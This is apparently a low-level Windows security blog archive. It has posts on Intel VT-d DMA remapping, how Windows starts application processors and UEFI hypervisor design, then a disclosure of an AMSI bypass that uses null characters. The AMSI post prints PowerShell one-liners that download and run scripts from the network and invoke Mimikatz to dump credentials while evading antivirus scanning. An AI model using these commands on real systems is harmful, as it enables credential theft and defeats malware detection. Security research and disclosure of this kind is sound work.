Monday, May 18, 2020

Introductory Study of IOMMU (VT-d) and Kernel DMA Protection on Intel Processors

This post is a write-up of an introductory study of Intel VT-d, especially how DMA remapping may be programmed and how Windows uses it. The hope is that this article helps you gain a basic understanding of it and start looking into the details that interest you.

Intel VT-d

Intel VT-d, formally called Intel Virtualization Technology for Directed I/O, consists of the following three features:
  • DMA Remapping
  • Interrupt Remapping
  • Interrupt Posting
DMA remapping is the most commonly discussed feature out of those and is the focus of this article.

DMA Remapping

DMA remapping is an important feature because it allows software to defend against Direct Memory Access (DMA) from malicious devices by configuring access permissions for each physical memory page. Ordinary memory page protections can be configured through the paging structures and, when Intel VT-x is used, through the Extended Page Tables (EPT), but those configurations are completely ignored for DMA access. Therefore, another protection mechanism is required to complete the protection of memory. DMA remapping provides it.

The following illustration from the specification highlights that DMA goes through DMA remapping instead of CPU memory virtualization (i.e., EPT).

VT-x Not Required

Ignore the upper half of the illustration above. It is a common misconception that VT-d (DMA remapping) is tied to VT-x, virtual machines, and such. DMA remapping is usable and useful without VT-x; Windows, for example, can enable a DMA remapping-based security feature (called Kernel DMA Protection) without requiring VT-x-based security (VBS: Virtualization Based Security) to be enabled.

The sample project shown in this post below enables DMA remapping independently as well.


DMA remapping is also referred to as IOMMU because it functions like a Memory Management Unit (MMU) for I/O memory access. Not only is the concept similar, but its programming interface is also very similar to that of the MMU, that is, the paging structures and EPT.

At a high level, the major difference is that DMA remapping uses two more tables for translation, on top of the familiar PML5, PML4, PDPT, PD, and PT. Simply put, translation with the MMU is
  • Hardware register => PML4 => PDPT => ...
while that of IOMMU is
  • Hardware register => Root table => Context table => PML4 => PDPT => ...
The specification refers to the tables referenced from the context table as the second-level page tables. The below diagram illustrates the translation flow.
Notice that,
  • The entry of the root table is selected based on the bus number of the device requesting DMA.
  • The entry of the context table is selected based on a combination of device and function numbers of the device.
As an example of bus:device:function (referred to as source-id) assignment, my test DMA-capable device is listed as Bus 6 : Device 0 : Function 0 on one system as shown below.
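To make the table selection concrete, here is a minimal sketch of how a source-id is packed and how it would index the root and context tables. The function names are hypothetical and only model the arithmetic; they are not taken from HelloIommuPkg.

```python
def make_source_id(bus: int, device: int, function: int) -> int:
    """Pack bus:device:function into the 16-bit source-id."""
    assert 0 <= bus < 256 and 0 <= device < 32 and 0 <= function < 8
    return (bus << 8) | (device << 3) | function


def table_indexes(source_id: int) -> tuple:
    """Return (root table index, context table index) for a source-id."""
    root_index = (source_id >> 8) & 0xFF  # bus number selects the root entry
    context_index = source_id & 0xFF      # device (5 bits) + function (3 bits)
    return root_index, context_index


# The test device from this post: Bus 6 : Device 0 : Function 0.
sid = make_source_id(6, 0, 0)
print(hex(sid), table_indexes(sid))
```

Because the context index is 8 bits wide, each context table holds 256 entries, one for every device and function combination on that bus.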

Sample Code and Demo

Let us jump into some code. HelloIommuPkg is a runtime DXE driver that enables DMA remapping and protects its first page (PE header) from DMA read and write by any device.

Loading this will yield the following output and protect the page if successful.
Then, performing DMA read with the test PCI device using PCILeech demonstrates that the other page is readable,

but the protected page is not.

By inspecting one of the reported fault-recording registers using RWEverything, it can be confirmed that DMA was indeed blocked by a lack of read-permission.
  • The first column indicates the faulting address (0x6ff48000)
  • The third column indicates the source-id of the requesting device (Bus 6 : Device 0 : Function 0)
  • 6 in the fourth column indicates the lack of read-permission.
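The columns above can also be decoded programmatically. The following is a rough sketch that assumes the 128-bit fault recording register layout from the VT-d specification (fault information in bits 63:12, source-id in bits 79:64, fault reason in bits 103:96, and the fault bit at 127). The register value is hypothetical, rebuilt from the numbers reported in this post rather than captured from hardware.

```python
def decode_fault_record(low: int, high: int) -> dict:
    """Decode selected fields of a fault recording register.

    low  -- bits 63:0 of the register
    high -- bits 127:64 of the register
    """
    source_id = high & 0xFFFF  # bits 79:64
    return {
        "fault_address": low & 0xFFFFFFFFFFFFF000,  # bits 63:12
        "bus": source_id >> 8,
        "device": (source_id >> 3) & 0x1F,
        "function": source_id & 0x7,
        "fault_reason": (high >> 32) & 0xFF,        # bits 103:96
        "fault": bool((high >> 63) & 1),            # bit 127
    }


# Hypothetical contents: address 0x6ff48000, source-id 6:0:0, reason 6.
low = 0x6FF48000
high = (1 << 63) | (0x06 << 32) | 0x0600
record = decode_fault_record(low, high)
print(record)
```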

Programming IOMMU 

Enabling DMA remapping at a minimum can be divided into the following steps:
  1. Locating the DMA Remapping Reporting (DMAR) ACPI table.
  2. Gathering information about the available DMA remapping hardware units from DMA-remapping hardware unit definition (DRHD) structures in (1).
  3. Configuring translation by initializing the tables mentioned above. 
  4. Writing hardware registers to use (3) and activating DMA remapping.
HelloIommuDxe.c roughly follows this sequence with some demonstration and error checking code. (1) and (2) are straightforward and can be validated with tools like RWEverything.

The complexity of (3) varies largely depending on how granular and selective the translations and memory protections need to be. HelloIommuPkg allows any access from any device to anywhere, except to the single protected page, which simplifies this step. (4) is mostly a matter of following the specification.
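As an illustration of step (3), the sketch below computes which second-level table entries cover a given address and builds a leaf entry with or without access permissions. It assumes the 4-level layout with 9 index bits per level and the read and write permission bits at bit 0 and bit 1 of a second-level entry, as described in the specification. The helper names are made up for this example and do not mirror HelloIommuPkg.

```python
READ = 1 << 0   # R bit of a second-level paging entry
WRITE = 1 << 1  # W bit of a second-level paging entry
ADDRESS_MASK = 0x000FFFFFFFFFF000


def second_level_indexes(address: int) -> dict:
    """Return the table index used at each level for an address."""
    return {
        "pml4": (address >> 39) & 0x1FF,
        "pdpt": (address >> 30) & 0x1FF,
        "pd": (address >> 21) & 0x1FF,
        "pt": (address >> 12) & 0x1FF,
    }


def make_leaf_entry(page_address: int, readable: bool, writable: bool) -> int:
    """Build a PT entry that maps a 4KB page with the given permissions."""
    entry = page_address & ADDRESS_MASK
    if readable:
        entry |= READ
    if writable:
        entry |= WRITE
    return entry


# The protected page from the demo: no read, no write.
print(second_level_indexes(0x6FF48000))
print(hex(make_leaf_entry(0x6FF48000, readable=False, writable=False)))
```

With both bits clear, any DMA read or write that reaches this entry faults, which is the behavior observed in the demo above.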

Overall, the minimum steps are simple, and HelloIommuPkg is less than 700 lines of code without comments.

Use of DMA Remapping on Windows 

Windows uses DMA remapping when available. If Kernel DMA Protection is not enabled on the system, Windows configures translations to pass through almost all requests from all devices, with few exceptions.

The following screenshot, taken from a system without Kernel DMA Protection, shows the translation for the DMA-capable device at Bus 7 : Device 0 : Function 0. The value 9 at the bottom right indicates that DMA requests are passed through (see "TT: Translation Type" in the specification).

Notice that most of the entries point to the same context table at 0x1ac000, which is configured for pass-through, providing no protection.
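To see why the value 9 means pass-through, the lower 64 bits of a context entry can be split into their fields. This sketch assumes the legacy-mode context entry layout from the specification (present bit at bit 0, fault processing disable at bit 1, translation type in bits 3:2, second-level table pointer in bits 63:12). The second sample value, 0x251001, is a hypothetical entry chosen only to show a non-pass-through case.

```python
TRANSLATION_TYPES = {
    0b00: "translate untranslated requests",
    0b01: "translate all requests (Device-TLB)",
    0b10: "pass-through",
    0b11: "reserved",
}


def decode_context_entry_low(low: int) -> dict:
    """Decode the lower 64 bits of a legacy-mode context entry."""
    translation_type = (low >> 2) & 0b11
    return {
        "present": bool(low & 1),
        "fault_processing_disable": bool((low >> 1) & 1),
        "translation_type": TRANSLATION_TYPES[translation_type],
        "second_level_table": low & 0x000FFFFFFFFFF000,
    }


print(decode_context_entry_low(0x9))       # present, pass-through
print(decode_context_entry_low(0x251001))  # present, translated via 0x251000
```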

As a side note, it would be technically possible for third-party Windows drivers to modify those translations and attempt to provide additional security against DMA unless VBS is enabled.

Use of DMA Remapping with Kernel DMA Protection

If Kernel DMA Protection is enabled, most of the translations are configured to fail. This is achieved by pointing to the second-level PML4 that is filled with zero, meaning translations are not present.

The below screenshot shows an example configuration with Kernel DMA Protection. Notice the context table at 0x1ac000 points to the second level PML4 at 0x251000, which is all zero.

Note that those memory locations are not visible if VBS is enabled. Disable it to inspect them.

Interestingly, I was not able to observe the described behavior of Kernel DMA Protection, in that, regardless of whether the screen is locked, performing DMA against the device resulted in bug check 0xE6: DRIVER_VERIFIER_DMA_VIOLATION (type 0x26). From what I read from Hal.dll, it made sense to bug check, but I doubt this is how Kernel DMA Protection is supposed to protect the system.


DMA remapping is part of the Intel VT-d architecture, provides security against DMA from malicious devices, and can be enabled without Intel VT-x. The sample project HelloIommuPkg demonstrates a simple setup of DMA remapping from UEFI with less than 700 lines of code.

We saw that Windows enables DMA remapping if available, and that when the Kernel DMA Protection feature is enabled, DMA access is mostly blocked through the second-level PML4.

Further Learning Resources

A cat protected from direct access.

Friday, March 20, 2020

Initializing Application Processors on Windows

This post guides you through the journey of starting up application processors (APs) on Windows. It can be read just for fun, but it can also help you make more sense of the INIT-SIPI-SIPI VM-exit sequence you have to handle when writing a UEFI hypervisor.

AP Initialization and Overview of Its Implementation

Before running any software code, hardware selects the processor that gets initialized and starts executing firmware code. This processor is called a bootstrap processor (BSP) and is basically the sole active processor until an operating system starts up the rest of the processors. 

Those non-BSP processors are called APs and are initialized by the BSP sending a sequence of inter-processor interrupts (IPIs): INIT, Startup IPI, and the 2nd Startup IPI. This sequence is also referred to as INIT-SIPI-SIPI.

As noted in the previous post, a hypervisor that starts earlier than the operating system needs to handle VM-exits caused by those IPIs. But when exactly does that happen?

On Linux, this is relatively easy to find out. Searching "STARTUP IPI" in Linux source code or other developers' forums leads you to the implementation, smpboot.c. On Windows 10, this is done in HalpApicStartProcessor, called from kernel's KeStartAllProcessors, in short. The stack trace is shown below: 

00 hal!HalpApicStartProcessor
01 hal!HalpInterruptStartProcessor
02 hal!HalStartNextProcessor
03 nt!KeStartAllProcessors
04 nt!Phase1InitializationDiscard
05 nt!Phase1Initialization
06 nt!PspSystemThreadStartup
07 nt!KiStartSystemThread

Let us look into a little more detail on Windows 19H1 (18362.1.amd64fre.19h1_release.190318-1202) without Hyper-V enabled. To be clear, the execution path varies drastically if Hyper-V is enabled.

High Level Flow

KeStartAllProcessors captures various system register values with KxInitializeProcessorState, updates per-processor bookkeeping data structures, and calls HalStartNextProcessor for each registered processor one by one to start all of them.

HalpInterruptStartProcessor builds the stub code and temporary data structures required for APs to go through real-mode, 32-bit protected-mode, and long-mode, such as page tables, the GDT, and the IDT. HalpLowStub (that is, PROCESSOR_START_BLOCK according to this talk by Alex Ionescu) is the address where those are built and the very entry point of the AP. We will review the entry point code and how it goes up to the NT kernel.

After the stub is built, HalpInterruptStartProcessor executes HalpApicStartProcessor, which is responsible for issuing the INIT-SIPI-SIPI sequence. Pseudo code of this function is shown below.

NTSTATUS HalpApicStartProcessor(
    UINT64,
    UINT32 LocalApicId,
    UINT64,
    UINT32 StartupIp
    )
{
    UINT32 sipiMessage;

    //
    // Assert INIT, then de-assert it. INIT-deassert IPI is done only for backward
    // compatibility.
    // See: Local APIC State After It Receives an INIT-Deassert IPI
    //
    HalpApicWriteCommand(LocalApicId, 0xC500); // APIC_INT_LEVELTRIG | APIC_INT_ASSERT | APIC_DM_INIT
    KeStallExecutionProcessor(10u);
    HalpApicWriteCommand(LocalApicId, 0x8500); // APIC_INT_LEVELTRIG | APIC_DM_INIT
    KeStallExecutionProcessor(200u);

    //
    // Compute the SIPI message value and send it.
    // "the SIPI message contains a vector to the BIOS AP initialization code (at
    //  000VV000H, where VV is the vector contained in the SIPI message)."
    // See: 8.4.3 MP Initialization Protocol Algorithm for MP Systems
    //
    sipiMessage = ((StartupIp & 0xFF000) | 0x600000u) >> 12;  // APIC_DM_STARTUP
    HalpApicWriteCommand(LocalApicId, sipiMessage);
    KeStallExecutionProcessor(200u);
    HalpApicWaitForCommand();
    KeStallExecutionProcessor(100u);

    //
    // Send the 2nd startup IPI.
    //
    HalpApicWriteCommand(LocalApicId, sipiMessage);
    KeStallExecutionProcessor(200u);

    return STATUS_SUCCESS;
}

Note that those HalpApic functions are function pointers that are set for xAPIC or x2APIC according to the system configuration.
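The magic numbers in the pseudo code can be reproduced from the individual command bits. The sketch below uses the constant names that appear in the comments of the pseudo code; the Python function names are hypothetical and only model the arithmetic, not the actual HAL implementation.

```python
APIC_DM_INIT = 0x500         # delivery mode: INIT
APIC_DM_STARTUP = 0x600      # delivery mode: Start-up (SIPI)
APIC_INT_ASSERT = 0x4000     # level: assert
APIC_INT_LEVELTRIG = 0x8000  # trigger mode: level


def init_assert_command() -> int:
    return APIC_INT_LEVELTRIG | APIC_INT_ASSERT | APIC_DM_INIT


def init_deassert_command() -> int:
    return APIC_INT_LEVELTRIG | APIC_DM_INIT


def sipi_command(startup_ip: int) -> int:
    """Build the SIPI command; the vector is bits [19:12] of the start address."""
    assert startup_ip & 0xFFF == 0 and startup_ip < 0x100000
    return APIC_DM_STARTUP | (startup_ip >> 12)


print(hex(init_assert_command()))    # 0xc500
print(hex(init_deassert_command()))  # 0x8500
print(hex(sipi_command(0x13000)))    # 0x613
```

The 0x13000 start address is the one observed later in this post; it must be 4KB-aligned and below 1MB because the vector is only 8 bits wide.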

Then let us review how APs get initialized by following the stub code.

AP Initialization Code

HalpRMStub - Real-Mode 

The entry point code is symbolized as HalpRMStub. As the name suggests, it runs in the real-mode right after the SIPI. As seen in the screenshot below, the stub code sets CR0.PE (0x1), enabling the protected mode, and jumps out to somewhere.

As it is 16-bit code, the disassembly shown by WinDbg is slightly broken. Below is the correct output.

Also, let us switch to physical addresses since the code runs in the real-mode.

From the code, the value of EDI is known to be 0x13000, because EDI is CS << 4, and CS is set from the SIPI vector, that is, bits [19:12] of the startup IP, as stated in 8.4.3 (see the comment in the above pseudo code).
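The relationship between the SIPI vector, CS, and EDI can be checked with a few lines of arithmetic. This is a small sketch of the rule quoted from 8.4.3 (execution starts at 000VV000H); the function name is hypothetical.

```python
def real_mode_entry(sipi_vector: int) -> tuple:
    """Return (CS selector, CS base) an AP starts with for a SIPI vector."""
    assert 0 <= sipi_vector <= 0xFF
    cs_selector = sipi_vector << 8  # CS = VV00h
    cs_base = cs_selector << 4      # real-mode base = 000VV000h
    return cs_selector, cs_base


vector = (0x13000 >> 12) & 0xFF  # vector derived from the startup IP
selector, base = real_mode_entry(vector)
print(hex(vector), hex(selector), hex(base))  # 0x13 0x1300 0x13000
```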

HalpPMStub - Protected-Mode 

Following EDI+0x60 navigates us to the protected mode stub implemented as HalpPMStub.

This code is responsible for switching to the long-mode. As seen below, it
  • sets CR4.PSE (0x1000),
  • updates IA32_EFER, then
  • sets CR0.PG (0x80000000) to activate the long-mode (see the second screenshot).

Then, it jumps out to where RDI+0x66 specifies. 

HalpLMIdentityStub - Long-Mode under Identity Mapping

The JMP leads to the short stub whose sole responsibility is to retrieve the value of CR3 that can permanently be used, that is, the same value as that of BSP.

As the processor should already be working with virtual addresses, let us switch to them.

RDI+0x70 gives us HalpLMStub.

HalpLMStub - Long-Mode

This is the final stub that APs go through. The first thing this stub does is apply the permanent CR3 value to have the same memory layout as the BSP (and any other already initialized APs), followed by invalidation of TLBs.

After switching the page tables, it performs various initialization, and at the end, it jumps out to where RDI+0x278 indicates.
This ends up at nt!KiSystemStartup, letting the AP run the same initialization code as the BSP (except for a few things done exclusively by the BSP).


We reviewed how Windows initiates execution of APs with the INIT-SIPI-SIPI sequence and how APs go through from real-mode to the regular NT kernel initialization function on Windows 10 19H1 without Hyper-V.
Hopefully, you enjoyed this post and gained more context on the INIT-SIPI-SIPI VM-exits you may see while writing a hypervisor.

Friday, March 13, 2020

Introduction and Notes on Design Considerations of UEFI-based Hypervisors

In this post, I am going to write up some of the lessons learned and the challenges I had to go through to write a UEFI-based hypervisor that supports booting Windows. I hope this post gives pointers to study and helps you get started with writing a similar hypervisor.
UEFI hypervisor brief design walk-through


Lately, I spent some time studying EDK2-based UEFI programming and developed a hypervisor as a UEFI driver. It has been fun and turned out to be more straightforward than I initially imagined, but at the same time, there was a learning curve and there were technical challenges I had to take extra time to understand and overcome.

The major reason for the extra time was the lack of write-ups or tutorials for my goal. Although there were a few open-source projects and many documents and presentations I was able to study, those were not focused on UEFI programming in the context of writing hypervisors. This is entirely understandable as I do not suppose those are common subjects, and that is also why I wrote this post.

In this post, I will start by giving a high-level overview of UEFI, and unique aspects in its execution environment, then look into challenges of writing a hypervisor as a UEFI driver.

UEFI Execution Environment


UEFI is the specification of firmware to replace legacy-BIOS, where no standard exists, and offers a well-defined execution environment and programming interfaces. EDK2 is the open-source, reference implementation of the specification and provides tools to develop firmware modules.

Application vs Driver

Firmware modules can be built as part of a whole firmware image or as a standalone module (file) to be separately deployed. The latter is how I compiled the module. Additionally, UEFI modules can be written as an application which is unloaded from memory once its execution finishes, or as a driver which remains loaded unless explicitly unloaded. Obviously, the driver is the natural choice for the hypervisor, although I will mention the other common approach later.

Boot Time vs Run Time

The execution environment of drivers can be separated into two different phases: boot time and run time.

Roughly speaking, the boot time is before execution is handed over to the operating system, and the run time is after that. This transition happens when a UEFI-defined API called ExitBootServices is called. In the case of Windows startup, this is sometime before winload.efi transfers its execution to ntoskrnl.exe.

Most of the firmware drivers loaded in memory are unloaded at this point because most of them, for example, a network driver for PXE boot, are no longer needed once execution is handed over to the operating system. These drivers are called boot drivers and are not suitable for a hypervisor that is meant to stay alive even after the operating system is fully started.

Runtime drivers, on the other hand, are the type of driver that resides in memory throughout the system life span and are suited for the hypervisor.

Boot-time Services vs Run-time Services

UEFI defines a collection of APIs, and their availability is impacted by the boot-to-run time transition. The type of API called boot-time services can no longer be used after the transition because drivers that implement the API are unloaded. After this transition, runtime drivers can only use the run-time services, which drastically reduces the ability of the hypervisor to interact with the environment.

Physical Mode vs Virtual Mode

Another transition that the runtime drivers have to go through is the change of the memory address layout.

At the boot time, the system is in the long-mode, same as Windows. However, virtual to physical address mapping is pure 1:1, that is, the virtual address 0xdf2000 is translated into the physical address 0xdf2000. This mode is called physical mode.

Soon after the transition to run time, a bootloader (winload.efi in the case of Windows) sets up new page tables to map runtime drivers to addresses that work well with the operating system (e.g., the physical address 0xdf2000 may be mapped to 0xfffff803`1ce40000). Then, the bootloader calls the SetVirtualAddressMap run-time service, letting runtime drivers perform their preparation, switches to the new page tables, and discards the old ones. After this point, the runtime drivers are mapped only to the new addresses, just like regular Windows drivers. This mode is called virtual mode. This transition can be catastrophic if the hypervisor depends on the physical mode page tables. We will review how it can be a problem.

Application Processor Start-Up

Another unique event that the UEFI hypervisor has to handle is processor initialization. Processors that are not selected as the bootstrap processor (BSP; the processor initialized first) are called application processors (APs) and are initialized after the transition to the virtual mode. This is done by the BSP signaling INIT and Startup-IPI (SIPI). When a SIPI is signaled, APs start execution in the real-mode and go through mode transitions up to the long-mode (in the case of 64-bit operating systems). This requires some extra VM-exit handling that was not relevant for blue pill-style hypervisors.

Those unique aspects of the UEFI environment pose technical challenges and require different hypervisor design considerations.

Challenges, Solutions, and Considerations

Host CR3

As mentioned, the host CR3 becomes invalid if the value at the time of driver load is used, because it points to the physical mode page tables, which get destroyed. The most straightforward solution is to set up our own page tables with the same translation as the existing ones (i.e., physical mode page tables) and use them for the host. This may sound complicated but is implemented with just 50 lines of C code in MiniVisor.
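To give a feel for how little is needed for 1:1 page tables, here is a toy model that builds an identity map with 1GB pages and walks it. This is only a sketch under simplifying assumptions: physical memory is modeled as a dictionary, the table addresses 0x1000 and 0x2000 are arbitrary, and the function names are hypothetical. It is not MiniVisor's code, which may be structured differently.

```python
PRESENT = 1 << 0
WRITABLE = 1 << 1
LARGE_PAGE = 1 << 7
ADDRESS_MASK = 0x000FFFFFFFFFF000
GIB = 1 << 30


def build_identity_map(memory: dict, pml4_address: int,
                       pdpt_address: int, size_in_gib: int) -> int:
    """Map the first size_in_gib GB 1:1 and return the value for the host CR3."""
    assert 0 < size_in_gib <= 512
    pml4 = [0] * 512
    pdpt = [0] * 512
    for i in range(size_in_gib):
        pdpt[i] = (i * GIB) | PRESENT | WRITABLE | LARGE_PAGE
    pml4[0] = pdpt_address | PRESENT | WRITABLE
    memory[pml4_address] = pml4
    memory[pdpt_address] = pdpt
    return pml4_address


def translate(memory: dict, cr3: int, virtual_address: int) -> int:
    """Walk PML4 and PDPT (1GB pages only) and return the physical address."""
    pml4e = memory[cr3 & ADDRESS_MASK][(virtual_address >> 39) & 0x1FF]
    if not pml4e & PRESENT:
        raise LookupError("PML4 entry not present")
    pdpte = memory[pml4e & ADDRESS_MASK][(virtual_address >> 30) & 0x1FF]
    if not pdpte & PRESENT:
        raise LookupError("PDPT entry not present")
    assert pdpte & LARGE_PAGE, "this model only uses 1GB pages"
    page_base = pdpte & ADDRESS_MASK & ~(GIB - 1)
    return page_base | (virtual_address & (GIB - 1))


memory = {}
host_cr3 = build_identity_map(memory, 0x1000, 0x2000, size_in_gib=4)
print(hex(translate(memory, host_cr3, 0xDF2000)))  # 0xdf2000
```

Because the host owns these tables, they stay valid after the bootloader discards the firmware's page tables.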

However, this results in different address translations once the guest switches to the virtual mode and makes it significantly more difficult for the host to interact with the guest. For example, host code cannot be debugged with tools like WinDbg anymore because none of the Windows code is mapped in a usable form while the host is running. If the hypervisor is going to need complex interaction with guest virtual addresses, other approaches might make it simpler in the end. In a private build, I implemented a guest shell-code that runs in the same address space as the NT system process for interaction with the guest.
Injecting the guest agent that hooks Windows kernel API
It also makes it harder to access the guest virtual memory from the host for the same reason without implementing the guest-virtual-to-host-virtual mapping mechanism. MiniVisor implements this in MemoryAccess.c. This is essentially what every single hypervisor implements. 

Host IDT

For the same reason the host CR3 is discarded, the host IDT becomes invalid if the value at the time of driver load is used. Although this does not cause an issue immediately because interrupts are disabled during execution of the host, any programming error causing an exception will cause a triple fault without running any diagnostics code. The solution is to create a dedicated IDT for the host.

Having its own IDT, however, means NMI can no longer be delivered to the Windows kernel if that occurs during the execution of the host (reminder: NMI still occurs even if interrupts are disabled). MiniVisor discards NMI for simplicity but you should consider reinjecting it into the guest instead.

Host GDT

You may wonder about the GDT. Yes, the GDT also needs to be created, but also requires modification because firmware does not set up the task state segment that is required for VMX.


The console output API is a boot-time service that cannot be used after the transition to run time. Hence, console-based logging must cease after that point. This could be addressed in several ways, such as hooking into an operating system logging API, but the simplest solution is to use serial output instead of console output. This has its limitations but requires almost zero extra code.

Another sensible option is to have a ring buffer to store log entries and, later, let a client application pull and print them out.
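The ring buffer idea can be sketched as follows. The class and method names are hypothetical, and a real hypervisor would implement this in C with a fixed-size array and its own synchronization; the sketch only shows the intended behavior of overwriting the oldest entries and letting a client drain the rest.

```python
from collections import deque


class LogRingBuffer:
    """Fixed-capacity log buffer that overwrites the oldest entries."""

    def __init__(self, capacity: int):
        self._entries = deque(maxlen=capacity)
        self.dropped = 0  # number of entries overwritten before being read

    def write(self, message: str) -> None:
        if len(self._entries) == self._entries.maxlen:
            self.dropped += 1  # the oldest entry is about to be discarded
        self._entries.append(message)

    def drain(self) -> list:
        """Return all buffered entries, oldest first, and empty the buffer."""
        entries = list(self._entries)
        self._entries.clear()
        return entries


log = LogRingBuffer(capacity=3)
for i in range(5):
    log.write("message %d" % i)
drained = log.drain()
print(drained, log.dropped)
```

Tracking the number of dropped entries lets the client application report that the log is incomplete rather than silently losing messages.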

Testing Application Processors Startup

This requires the hypervisor to handle VM-exits as well as proper emulation of paging mode transitions that are not relevant for blue pill-style hypervisors. Specifically, handling of INIT, SIPI, and CR0.PG access is required.

For me, this was one of the most challenging parts of writing a hypervisor that supports booting an operating system, mostly due to the lack of virtualization solutions usable as a test environment and the differences between them and the bare-metal environment (e.g., TLB, MSR, etc.), requiring thorough testing on bare metal.

My recommendation is to buy and set up a single-board computer with a serial port so you can at least do printf-debugging (or even better, Direct Connect Interface support). I might blog about selecting devices and setting them up.
Testing with a single-board computer

Driver vs Standalone File

Compiling the hypervisor as a runtime driver works as demonstrated in the project. However, the more common approach is to build the hypervisor as a separate file and have a UEFI application load it into memory and start executing it. That is how the VMware hypervisor and Hyper-V are implemented, for example. The standalone hypervisor format is often ELF because of wider cross-platform compiler and debugging tool support.

This approach has an advantage that the hypervisor code remains platform agnostic and re-usable; for example, one can write a small Windows driver as a hypervisor loader without mixing up platform dependent loader code and hypervisor code that should be platform independent. Then, the hypervisor module can remain portable.

MiniVisor did not take this approach only because it started as an experiment without much structure. I plan to restructure the project in this way.


We reviewed some unique aspects of the UEFI environment and how those impact the design and implementation of hypervisors compared with those designed under the blue pill model. We also looked at how MiniVisor was designed to work with those new factors and the implied limitations.

While this short blog post may not be sufficient for some readers to have clear ideas of those challenges and the explained solutions, I hope it gives you some pointers to study the codebase of MiniVisor and helps you make sense of why things are written differently than in blue pill-style Windows hypervisors.

Further Learning

As a final note, if you are particularly curious about tooling hypervisors for research and/or just having a solid understanding of the underlying technologies and concepts, Bruce Dang and I plan to offer a 5-day class this October. This will let you write your hypervisor for both Windows and UEFI environments, develop "something useful" and play with them on physical and virtual machines to internalize technical details.

Please sign up from this page or contact us if you are interested.

Friday, February 16, 2018

AMSI Bypass With a Null Character

In this blog post, I am going to look into a flaw I reported a few months ago and see how the flaw could have been exploited to execute malicious PowerShell scripts and commands while bypassing AMSI based detection. This issue has been fixed as defense-in-depth with the February Update.

What is AMSI

AMSI, Anti-malware Scan Interface, is a mechanism that Windows 10+ provides to security software vendors for developing software that subscribes to certain events and detects malicious contents. AMSI issues several types of events, but the ones most commonly used by software vendors are arguably the events about execution of scripts, where software can receive the contents of scripts and commands about to be executed (I will refer to them simply as contents), then scan and block them.

The below illustration is an overview of how this event is generated and notified to security software for scanning.

The red boxes are security software that subscribes to the events from AMSI and are called AMSI providers. When supported script engines such as PowerShell (i.e., System.Management.Automation.dll) and Windows Script Host (e.g., JScript.dll) execute contents, they call one of the functions exported from amsi.dll with the contents to scan with AMSI providers.

As illustrated above, AMSI providers rely on script engines to call the exported function and forward contents properly through amsi.dll; otherwise, they would not receive the contents and could not detect malicious strings.

The Bug

The bug was that System.Management.Automation.dll did not account for the possibility that PowerShell contents could include null characters, and it called AmsiScanString, which treats a null character as the end of the contents, to forward the contents to AMSI providers. Here is the prototype of the API.
HRESULT WINAPI AmsiScanString(
  _In_     HAMSICONTEXT amsiContext,
  _In_     LPCWSTR      string,   // Will be terminated at the first null character
  _In_     LPCWSTR      contentName,
  _In_opt_ HAMSISESSION session,
  _Out_    AMSI_RESULT  *result
);

Because of this bug, amsi.dll could truncate contents (the value of "string" above) at the first null character before sending them to AMSI providers. As a result, AMSI providers could not scan all of the contents and detect malicious strings.
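The effect of the truncation can be modeled in a few lines. This sketch does not call amsi.dll; the functions are hypothetical stand-ins that only mimic what a provider would see when contents are passed as a null-terminated string versus a buffer with an explicit length.

```python
def seen_via_string_api(content: str) -> str:
    """Contents visible when treated as a null-terminated wide string."""
    return content.split("\x00", 1)[0]


def seen_via_buffer_api(content: str, length: int) -> str:
    """Contents visible when passed as a buffer with an explicit length."""
    return content[:length]


def is_detected(visible: str, signature: str) -> bool:
    """A naive provider that looks for a known string."""
    return signature in visible


script = "#\x00\nInvoke-Mimikatz -DumpCerts"
signature = "Invoke-Mimikatz"

truncated = seen_via_string_api(script)
full = seen_via_buffer_api(script, len(script))
print(repr(truncated), is_detected(truncated, signature))
print(is_detected(full, signature))
```

The string-based view ends at "#", so the naive provider never sees the signature, while the length-based view exposes the whole script.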


The basic idea for exploitation is to place a null character into PowerShell contents before malicious strings appear.

File Based Exploitation

As a basic exploitation scenario, let us assume we are trying to execute Invoke-Mimikatz like this and it is being detected.
> powershell "IEX (New-Object Net.WebClient).DownloadString('')"

This is because the contents being Invoke-Expression'd are visible to AMSI providers as shown in the below screenshot.

Such detection can be bypassed by placing a null character at the beginning of the file being Invoke-Expression'd.

> powershell "IEX (New-Object Net.WebClient).DownloadString('')"
This successfully bypasses scanning and detection by AMSI providers as seen below ("Get-ChildItem Function: | Select-String Invoke" is added for demonstration purposes).

Command Line Based Exploitation

With the above successful bypass, you might try to execute the loaded Invoke-Mimikatz like below, but find that it gets detected due to the appearance of "Invoke-Mimikatz" in the command line.
powershell "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCerts"

A naive approach with Invoke-Expression could bypass process command line based detection but not AMSI based one, as "Invoke-Mimikatz" will still be visible to AMSI providers. Here is such an unsuccessful attempt.
powershell "IEX (New-Object Net.WebClient).DownloadString(''); IEX ('Invoke-'+'Mimikatz -DumpCerts')"

To bypass AMSI detection in this scenario, we can insert a null character into the command line with a bit of string manipulation.
powershell "IEX (New-Object Net.WebClient).DownloadString(''); IEX ('if(0){{{0}}}' -f $(0 -as [char]) + 'Invoke-'+'Mimikatz -DumpCerts')"

The highlighted part prepends to the original command line a null character that never gets executed. The resulting string looks like this.
if (0) {<NULL>} the rest of commands

This can successfully prevent AMSI providers from receiving all of the contents and detecting "Invoke-Mimikatz."
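The brace escaping in the format string is easy to misread, so here is a small model of it. Python's str.format treats doubled braces as literal braces in the same way as the PowerShell expression above is described to behave, so it is used here purely to illustrate the resulting string; no PowerShell or AMSI code is involved.

```python
# '{{' and '}}' are literal braces; '{0}' is replaced with the null character.
null_prefix = "if(0){{{0}}}".format(chr(0))

command = null_prefix + "Invoke-" + "Mimikatz -DumpCerts"

# What a consumer that stops at the first null character would see.
visible = command.split("\x00", 1)[0]

print(repr(null_prefix))  # 'if(0){\x00}'
print(repr(visible))      # 'if(0){'
```

Everything after the null character, including the concatenated command name, falls outside the visible part.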

Summary of Exploitation

For file contents, insert "#<NULL>" at the beginning of the file and at any places where additional scans with AMSI occur. To identify the latter places, some trial and error will be needed. Using a debugger and logging invocations of AmsiScanString with the below command will be helpful.
bp amsi!AmsiScanString "du @rdx;g"

For command line contents, wrap them into Invoke-Expression and prepend "'if(0){{{0}}}' -f $(0 -as [char]) +". Here is another step-by-step example to bypass detection on "AmsiUtils" and "amsiInitFailed" in the below contents:

1. Wrap the original contents with Invoke-Expression.
